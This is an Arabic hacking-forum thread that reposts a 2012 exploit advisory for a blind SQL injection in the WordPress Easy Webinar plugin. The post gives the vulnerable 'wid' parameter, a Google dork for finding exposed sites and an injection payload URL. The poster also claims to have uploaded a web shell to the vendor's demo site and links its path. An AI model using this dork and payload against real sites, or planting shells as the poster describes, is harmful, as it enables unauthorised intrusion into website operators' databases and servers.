Follow us on Twitter Follow us on Facebook Watch us on YouTube





العودة   development-point > [ أقسام حماية واختراق المواقع والسيرفرات ] > قسم اختراق المواقع والسيرفرات > قسم الثغـرات
تحديث الصفحة Wordpress Easy Webinar Plugin Blind SQL
التسجيل التعليمـــات التقويم البحث مشاركات اليوم اجعل كافة الأقسام مقروءة


Wordpress Easy Webinar Plugin Blind SQL

# Exploit Title: Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability # Vendor Homepage: www.easywebinarplugin.com # Date: 10/26/2012 # Author: Robert Cooper (robert.cooper areyousecure.net)

 
 
أدوات الموضوع انواع عرض الموضوع
السابق المشاركة السابقة   المشاركة التالية التالي
قديم منذ /11-29-2012, 06:37 PM   #1
Mr iNFiNiTi
Creator

الصورة الرمزية Mr iNFiNiTi

Mr iNFiNiTi غير متواجد حالياً

 رقم العضوية : 149
 تاريخ التسجيل : Nov 2012
 العمر : 35
 الجنس : ~ ذكر
 البلد : SauDi
 المشاركات : 94
 إهتمامك : Hacking
 النقاط : 23
 قوة التقييم : Mr iNFiNiTi is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي Wordpress Easy Webinar Plugin Blind SQL

كود:
# Exploit Title: Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability 
# Vendor Homepage: www.easywebinarplugin.com
 
# Date: 10/26/2012
 
# Author: Robert Cooper (robert.cooper [at] areyousecure.net)
 
# Tested on: [Linux/Windows 7]
 
#Vulnerable Parameters: wid=
 
 
# Google Dork: allinurl: get-widget.php?wid=
 
##############################################################
Exploit:
 
www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=[SQLi]
 
Note: The HTTP response will read 404, but this is false:
 
www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=3' or 'x'='x






 
This will result in the page loading correctly and show that the plugin is vulnerable to injection (string).
##############################################################
 
www.areyousecure.net
 
# Shouts to the Belegit crew

شل على موقع الاضافة من رفعي Wordpress Easy Webinar Plugin Blind SQL SnipeR (29).gif

http://demo.easywebinarplugin.com/wp...n/webadmin.php

المصدر: development-point - للمزيد تابع : قسم الثغـرات

Wordpress Easy Webinar Plugin Blind SQL
  رد مع اقتباس
 

مواقع النشر (المفضلة)

جديد قسم الثغـرات

« الموضوع السابق | الموضوع التالي »

الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع
العرض الشجري العرض الشجري

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
الانتقال السريع

المواضيع المتشابهه للموضوع: Wordpress Easy Webinar Plugin Blind SQL
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
رفع شل على لوحه تحكم wordpress انس العوادي قسم اختراق المواقع والسيرفرات 15 09-04-2013 06:25 PM
ثـغرة الورد بريس : Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities MhWy قسم الثغـرات 10 09-02-2013 02:21 AM
تخمين WordPress باستخدام مشروع Metasploit SnipeR قسم توزيعات أختبار الأخترآق المتقدم 1 08-30-2013 02:44 PM
حصريا Easy Driver Pro 8.0.3 ‏windows 8 الأرشيف 0 11-04-2012 07:40 PM
برنامج تغيير الاي بيHide IP Easy ,الشرح التفصيلى لعملاق تغيير الايبى Hide IP Easy v5.2.0.6 Final aaqassam جديد البرامج والتطبيقات 2 11-01-2012 07:08 PM


الساعة الآن 02:44 AM

 


الاتصال بنا - نقطة development-point - الأرشيف - بيان الخصوصية - الأعلى

Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
development-point
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47